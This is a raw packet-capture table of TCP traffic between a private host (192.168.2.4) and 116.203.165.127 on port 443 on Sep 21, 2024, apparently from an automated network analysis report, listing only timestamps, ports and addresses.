Sep 21, 2024 18:51:50.746345997 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:50.746428013 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:50.772526026 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:50.772541046 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:50.776859045 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:50.776865005 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.175033092 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.175092936 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.175134897 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.175152063 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.175177097 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.175190926 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.175206900 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.175240993 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.205732107 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.205780029 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.205832005 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.205845118 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.206001043 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.206001043 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.272849083 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.272922993 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.273226976 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.273226976 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.273241997 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.273296118 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.302417040 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.302438974 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.302541018 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.302572012 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.302629948 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.340476990 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.340521097 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.340588093 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.340626955 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.340698957 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.340698957 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.370858908 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.370922089 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.371064901 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.371064901 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.371083975 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.371129990 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.389965057 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.390007973 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.390168905 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.390168905 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.390185118 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.390240908 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.407814980 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.407857895 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.407937050 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.407963037 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.407978058 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.408004999 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.425143003 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.425187111 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.425343990 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.425344944 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.425375938 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.425424099 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.439743996 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.439784050 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.439853907 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.439861059 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.439873934 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.439903975 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.456938028 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.456980944 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.457060099 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.457073927 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.457108021 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.457125902 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.470340967 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.470397949 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.470463037 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.470472097 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.470521927 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.485982895 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.486026049 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.486073017 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.486082077 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.486114979 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.486139059 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.497227907 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.497270107 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.497323036 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.497329950 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.497370958 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.505805969 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.505846977 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.505877018 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.505882978 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.505909920 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.505923986 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.513782978 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.513847113 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.513865948 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.513871908 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.513892889 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.513910055 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.513986111 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.514036894 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.514229059 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.514246941 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.515531063 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.515588999 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:51.515685081 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.515917063 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:51.515945911 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.318766117 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.318965912 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.319470882 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.319483995 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.322243929 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.322254896 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.751688957 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.751712084 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.751729965 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.751771927 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.751812935 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.751831055 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.751904011 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.783364058 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.783392906 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.783443928 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.783461094 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.783492088 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.783513069 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.851907969 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.851953030 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.851991892 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.852013111 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.852042913 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.852061987 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.878474951 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.878526926 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.878551006 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.878566980 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.878597975 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.878622055 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.911730051 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.911768913 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.911807060 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.911814928 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.911832094 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.911847115 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.911860943 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.911885977 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.912122965 CEST	49755	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.912136078 CEST	443	49755	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.913017035 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.913074970 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:52.913192987 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.913461924 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:52.913496971 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:53.661891937 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:53.661993980 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:53.662468910 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:53.662488937 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:53.664493084 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:53.664508104 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.108670950 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.108699083 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.108717918 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.108757973 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.108757973 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.108813047 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.108844042 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.108867884 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.140043020 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.140064955 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.140141964 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.140186071 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.140219927 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.140243053 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.209742069 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.209770918 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.210048914 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.210114002 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.210181952 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.240540981 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.240577936 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.240636110 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.240678072 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.240708113 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.240731955 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.279946089 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.279973030 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.280021906 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.280064106 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.280107021 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.280107021 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.311048985 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.311070919 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.311181068 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.311213017 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.311271906 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.330481052 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.330502033 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.330662012 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.330662012 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.330682039 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.330734968 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.348639011 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.348659992 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.348730087 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.348748922 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.348777056 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.348797083 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.367106915 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.367126942 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.367326975 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.367391109 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.367486954 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.381973982 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.381994009 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.382215977 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.382280111 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.382349014 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.399957895 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.399976969 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.400064945 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.400127888 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.400192022 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.413916111 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.413934946 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.414155006 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.414217949 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.414298058 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.429037094 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.429058075 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.429130077 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.429192066 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.429402113 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.440839052 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.440856934 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.441008091 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.441008091 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.441040993 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.441093922 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.449882030 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.449901104 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.450074911 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.450138092 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.450212955 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.459764004 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.459793091 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.459847927 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.459897041 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.459933996 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.459959984 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.468899012 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.468919992 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.468966961 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.468986988 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.469014883 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.469037056 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.476140976 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.476186037 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.476258039 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.476258039 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.476324081 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.476383924 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.486690998 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.486732006 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.486773968 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.486797094 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.486824036 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.486843109 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.498016119 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.498058081 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.498114109 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.498176098 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.498270035 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.498270035 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.511636972 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.511678934 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.511821985 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.511821985 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.511885881 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.511951923 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.524332047 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.524370909 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.524559021 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.524620056 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.524704933 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.524704933 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.535657883 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.535700083 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.535865068 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.535934925 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.535980940 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.536009073 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.543771029 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.543813944 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.543973923 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.543973923 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.544039011 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.544095039 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.553154945 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.553200006 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.553252935 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.553272009 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.553306103 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.553328991 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.560400009 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.560419083 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.560594082 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.560628891 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.560683012 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.568643093 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.568662882 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.568718910 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.568734884 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.568764925 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.568787098 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.579586029 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.579617023 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.579667091 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.579680920 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.579711914 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.579734087 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.598498106 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.598522902 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.598603010 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.598617077 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.598778963 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.611099958 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.611144066 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.611356020 CEST	49756	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:54.611371040 CEST	443	49756	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:54.611476898 CEST	49756	443	192.168.2.4	116.203.165.127
